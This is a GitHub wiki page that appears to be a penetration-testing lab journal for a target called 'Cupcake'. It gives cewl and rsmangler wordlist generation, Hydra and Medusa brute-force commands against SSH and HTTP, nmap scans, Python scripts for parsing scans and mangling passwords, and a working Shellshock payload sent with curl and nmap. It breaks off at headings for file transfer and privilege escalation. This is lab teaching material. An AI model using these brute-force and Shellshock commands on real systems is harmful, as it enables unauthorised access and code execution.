Cupcake - DefiantCoder/Tech-Journals GitHub Wiki

  • CEWL Create Custom Wordlist

cewl -w filename.txt -d 0 http://IP ADDRESS/

-w writes the scraped words to filename.txt; -d 0 spiders only the page given and does not follow links.

  • RSMANGLER

cat user.txt | rsmangler -y -t -m 9 -x 12 -d -f - > user_pass.txt

-f - reads the base words from stdin and -m 9 / -x 12 keep only candidates 9 to 12 characters long. rsmangler's mangling options are all on by default and naming one turns it off, so -y, -t and -d drop the year, leet and doubled variants from the output.

  • Medusa

medusa -h IP ADDRESS -u uname -P user_pass.txt -M http

  • Hydra

hydra -l user.name -P user_pass.txt -f IP ADDRESS ssh

-l is the single login to try, -P the password file, and -f stops hydra as soon as a valid login/password pair is found.

  • How you determined the versions of the two services exposed by cupcake

sudo nmap -A -sV -O -p 1-6000 10.0.5.23

This scans the first 6000 TCP ports; -A already turns on version detection (-sV) and OS detection (-O), so those two flags are redundant here. The VERSION column of the output gives the versions of the two exposed services.

  • How you dealt with parsing nmap result with nmaptocsv

sudo nmap -sT -sV -p 1-1000 10.0.5.23 -Pn -oG top1000.txt

This scans ports 1 to 1000 (a fixed range, not nmap's frequency-based --top-ports 1000) without host discovery and writes the result in grepable format, which is the input nmaptocsv turns into CSV.
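As an added example, not nmaptocsv's code and not from the original page, the script below does the same job on a constructed sample of nmap -oG output: it parses each Ports entry into host/port/protocol/state/service/version rows and writes them as CSV. The sample scan text, its version strings (made up, not the real result for 10.0.5.23) and the function names parse_grepable, open_ports and to_csv are all mine.

```python
import csv
import io
import re
import sys

# Constructed sample of nmap -oG (grepable) output; the version strings are
# made up and are not the real scan result for the target.
SAMPLE_OG = """\
# Nmap 7.93 scan initiated Sat Jan  1 12:00:00 2023 as: nmap -sT -sV -p 1-1000 -Pn -oG top1000.txt 10.0.5.23
Host: 10.0.5.23 ()\tStatus: Up
Host: 10.0.5.23 ()\tPorts: 22/open/tcp//ssh//OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.4.7 ((Ubuntu))/\tIgnored State: closed (998)
# Nmap done at Sat Jan  1 12:00:05 2023 -- 1 IP address (1 host up) scanned in 5.00 seconds
"""

FIELDS = ["ip", "hostname", "port", "protocol", "state", "service", "version"]

# "Host: <ip> (<hostname>)" followed by tab-separated "Key: value" sections.
HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\((.*?)\)\s*(.*)$")
# Port entries are separated by ", ", but a version string may itself contain
# a comma, so only split where the next entry (a port number and '/') begins.
ENTRY_SPLIT_RE = re.compile(r",\s+(?=\d+/)")


def parse_grepable(text):
    """Return one dict per port from nmap -oG text. Each entry in the Ports
    section has the form port/state/protocol/owner/service/rpc/version/."""
    rows = []
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # comment lines and the "Nmap done" trailer
        ip, hostname, rest = m.groups()
        sections = dict(s.split(": ", 1) for s in rest.split("\t") if ": " in s)
        ports = sections.get("Ports")
        if not ports:
            continue  # "Status: Up" lines carry no port data
        for entry in ENTRY_SPLIT_RE.split(ports):
            # Drop the trailing '/' and split into at most 7 fields so that a
            # '/' inside the version string cannot shift the columns.
            parts = entry.strip().rstrip("/").split("/", 6)
            if len(parts) < 7:
                continue
            port, state, proto, _owner, service, _rpc, version = parts
            rows.append({
                "ip": ip, "hostname": hostname, "port": int(port),
                "protocol": proto, "state": state, "service": service,
                "version": version,
            })
    return rows


def open_ports(rows):
    """Sorted list of open port numbers, the quick check for what to attack next."""
    return sorted(r["port"] for r in rows if r["state"] == "open")


def to_csv(rows):
    """Render the rows as CSV text with a header line."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=FIELDS, lineterminator="\n")
    writer.writeheader()
    writer.writerows(rows)
    return buf.getvalue()


if __name__ == "__main__":
    # Usage: python3 nmap_og_to_csv.py top1000.txt   (no argument: parse the sample)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_OG
    sys.stdout.write(to_csv(parse_grepable(text)))
```

Run it against the top1000.txt written by the -oG scan above to get the same host, port, service and version columns that nmaptocsv produces; open_ports gives the list to feed into the next step.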

  • The techniques you used to invoke remote code execution

Nmap :

nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/status,cmd="echo ; echo ; /bin/uname -s -r -v" 10.0.5.23

The http-shellshock NSE script sends the Shellshock payload to /cgi-bin/status and runs the command given in cmd; with uname -s -r -v the response carries the kernel name, release and version.

Curl :

curl -s -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat status' http://10.0.5.23/cgi-bin/status

Both requests exploit Shellshock (CVE-2014-6271): the CGI handler exports the User-Agent header as an environment variable, bash parses the "() { :; };" function definition and then executes whatever follows it. The two echo commands emit the blank line that ends the HTTP headers, so the command output comes back as the response body instead of a server error; here /bin/cat status dumps the CGI script itself from the directory it runs in.

  • The generation of a list of passwords and subsequent ssh bruteforce

hydra -l samwise -P passwordlist.txt 10.0.5.23 -t 4 ssh

With a password list in hand, this determines the password for samwise; -t 4 limits hydra to four parallel connections, which sshd tolerates far better than hydra's default of 16.
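The RSMANGLER command earlier on the page and this hydra run both rely on a mangled password list. As an added example that is neither rsmangler's nor hydra's code, the simplified mangler below shows what that list looks like: it takes base words (usernames or cewl output), expands them with case, leet, doubled, suffix and year variants, and keeps only candidates of 9 to 12 characters, mirroring -m 9 -x 12. The function names, the substitution table, the suffix list and the demo words are mine.

```python
import sys

# rsmangler-style leet substitutions (a->4, e->3, i->1, o->0, s->5, t->+);
# the table is my choice, not rsmangler's exact one.
LEET = str.maketrans("aeiost", "43105+")


def case_variants(word):
    """Plain, lower, UPPER, Capitalised and sWAPPED-case forms of a word."""
    return {word, word.lower(), word.upper(), word.capitalize(), word.swapcase()}


def mangle(words, min_len=9, max_len=12, years=(), leet=True, double=True,
           suffixes=("!", "1", "123")):
    """Expand base words into password candidates and keep only those whose
    length lies in [min_len, max_len], which is what rsmangler's -m/-x do.
    Output order is deterministic and duplicates are dropped so hydra does
    not waste attempts."""
    seen = set()
    out = []
    for base in words:
        stems = set()
        for w in case_variants(base):
            stems.add(w)
            if leet:
                stems.add(w.translate(LEET))
            if double:
                stems.add(w + w)
        for stem in sorted(stems):
            candidates = [stem] + [stem + s for s in suffixes]
            for y in years:
                candidates += [f"{stem}{y}", f"{y}{stem}"]
            for c in candidates:
                if min_len <= len(c) <= max_len and c not in seen:
                    seen.add(c)
                    out.append(c)
    return out


if __name__ == "__main__":
    # Usage: python3 mangle.py user.txt > user_pass.txt   (no argument: demo words)
    if len(sys.argv) > 1:
        base = [line.strip() for line in open(sys.argv[1]) if line.strip()]
    else:
        base = ["samwise", "cupcake"]  # demo words, not a real wordlist
    for pw in mangle(base, years=range(1990, 2025)):
        print(pw)
```

A seven-character username such as samwise never appears on its own in the output (too short), its doubled form is dropped as too long, and the year and suffix variants survive, which is exactly the effect of the -m 9 -x 12 bounds on the list hydra is then given.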

  • Transfer of files using python and wget or any other mechanism you chose

  • Compiling and running a privilege escalation exploit (It can be different than the dem